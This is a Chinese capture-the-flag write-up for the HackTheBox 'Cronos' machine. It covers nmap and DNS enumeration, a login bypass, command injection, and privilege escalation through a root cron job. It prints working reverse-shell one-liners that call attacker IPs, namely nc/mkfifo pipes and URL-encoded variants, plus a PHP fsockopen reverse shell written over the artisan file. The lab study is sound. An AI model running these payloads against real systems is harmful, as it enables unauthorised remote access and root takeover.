HTB-靶机-Cronos

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.13

nmap -sV -sC -p- -T5 -oN cronos.nmap 10.10.10.13

nmap扫描结果

根据扫描结果开放了3个端口，奇怪的是还有dns服务，瞬间觉得跟解析有关，而且既然是跟dns有关，那么可能逃不开DNS区域传送之类的漏洞，所以本地绑定hosts 继续搞

发现有个admin域名，加进去继续搞

然后访问80端口的域名

是个登录界面，试了下万能密码居然就进去了

进去之后根据经验就知道有命令执行漏洞，玩过DVWA的就知道了，所以测试下验证结果

确认没有问题，直接反弹shell，这里试了下直接使用nc进行反弹shell，有问题，需要使用不带nc参数-e的反弹命令进行反弹，当然这里也发现有python环境，反弹姿势很多

反弹shell形式，nc没有参数e的时候执行
rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 10.10.14.4 8833 1>/tmp/p

其他形式的没有nc参数e的反弹命令
正常命令：rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.41 1234 >/tmp/f
写法1：rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.41 1234 >/tmp/f
写法2：rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.41+1234+>/tmp/f
上面因为&会被用于分割两个参数，所以要把&符号转义成%26

成功反弹shell之后，使用 https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh 枚举操作系统可以提权的信息，确认一个计划任务是使用root执行，可以更改此计划任务执行反弹shell进行提权

得到上面计划任务提权的方式，就更改文件artisan即可提权成功，下面是基本的两种方式

可以使用下面两种
执行php反弹shell
1. 使用pipe通道稳定反弹
echo '<?php $sock = fsockopen("10.10.14.41",1337);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>' > /var/www/laravel/artisan

2. 使用php-reverse-shell反弹shell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

提权成功拿到flag.txt